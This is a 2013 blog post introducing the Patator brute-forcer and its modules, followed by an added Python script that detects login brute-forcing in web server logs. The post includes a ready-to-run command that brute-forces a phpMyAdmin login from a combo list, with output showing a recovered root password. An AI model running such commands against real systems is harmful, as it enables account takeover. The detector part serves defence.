Sunday, June 23, 2013

Patator - BruteForcer-ng

Patator is a multi-purpose brute-forcer with a modular design and flexible usage, and it is NOT script-kiddie friendly.
Currently (v0.4), it supports the following modules:
 * ftp_login     : Brute-force FTP
 * ssh_login     : Brute-force SSH
 * telnet_login  : Brute-force Telnet
 * smtp_login    : Brute-force SMTP
 * smtp_vrfy     : Enumerate valid users using the SMTP VRFY command
 * smtp_rcpt     : Enumerate valid users using the SMTP RCPT TO command
 * finger_lookup : Enumerate valid users using Finger
 * http_fuzz     : Brute-force HTTP/HTTPS
 * pop_login     : Brute-force POP
 * pop_passd     : Brute-force poppassd (not POP3)
 * imap_login    : Brute-force IMAP
 * ldap_login    : Brute-force LDAP
 * smb_login     : Brute-force SMB
 * smb_lookupsid : Brute-force SMB SID-lookup
 * vmauthd_login : Brute-force VMware Authentication Daemon
 * mssql_login   : Brute-force MSSQL
 * oracle_login  : Brute-force Oracle
 * mysql_login   : Brute-force MySQL
 * mysql_query   : Brute-force MySQL queries
 * pgsql_login   : Brute-force PostgreSQL
 * vnc_login     : Brute-force VNC
 * dns_forward   : Brute-force DNS
 * dns_reverse   : Brute-force DNS (reverse lookup subnets)
 * snmp_login    : Brute-force SNMPv1/2 and SNMPv3
 * unzip_pass    : Brute-force the password of encrypted ZIP files
 * keystore_pass : Brute-force the password of Java keystore files



Usage example: 
  • HTTP : Brute-force phpMyAdmin logon
 $ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST \
     body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en' \
     0=combos.txt follow=1 accept_cookie=1 \
     -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
 10:55:50 patator    INFO - Starting Patator v0.4 (http://code.google.com/p/patator/) at 2012-06-29 10:55 EST
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - code & size     | candidate           |   num | mesg ..
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - 200 8209:7075   | root:               |    22 | HTTP/1.1 200 OK
 10:55:51 patator    INFO - 200 3838:2566   | root:p@ssw0rd       |    44 | HTTP/1.1 200 OK
 ^C
 10:55:52 patator    INFO - Hits/Done/Size/Fail: 2/125/2342/0, Avg: 47 r/s, Time: 0h 0m 2s
 10:55:52 patator    INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12
 
Payload #22 was a false positive:
 $ cat /tmp/qsdf/22_200_8209\:7075.txt
 ...
 <div class="error">Login without a password is forbidden by configuration (see AllowNoPassword)</div>
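
On the defending side, a run like the one above shows up in the web server's access log as a burst of POSTs to the login page from a single client. The detector below is an added example, not part of the original post or of Patator; the log format (Apache combined), client addresses, threshold and window are assumptions, and the sample log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/phpmyadmin/index.php"   # login URL from the usage example above
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse(line):
    """Return (ip, timestamp, method, path) or None if the line does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]

def detect_bruteforce(lines, threshold=20, window=timedelta(seconds=10)):
    """Map each client IP exceeding `threshold` login POSTs per `window` to its peak count."""
    # The status code is ignored on purpose: in the output above both the false
    # positive and the real hit are HTTP 200, so request rate is the signal used.
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs inside the window
    peaks = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if method != "POST" or path != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:      # evict entries older than the window
            q.popleft()
        if len(q) > threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def sample_log():
    """Constructed log: one ordinary user, then one client at ~47 POSTs/s for 2 s."""
    fmt = '{ip} - - [29/Jun/2012:10:55:{s:02d} +0000] "{m} {p} HTTP/1.1" 200 {size}'
    lines = [fmt.format(ip="192.0.2.10", s=s, m=m, p=LOGIN_PATH, size=3838)
             for s, m in [(10, "GET"), (12, "POST"), (40, "POST")]]
    lines += [fmt.format(ip="198.51.100.7", s=50 + i // 47, m="POST", p=LOGIN_PATH, size=8209)
              for i in range(94)]
    return lines

if __name__ == "__main__":
    print(detect_bruteforce(sample_log()))
```

The same counter can feed a rate limit or temporary block on the login path once a client crosses the threshold.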
Download/Source: patator
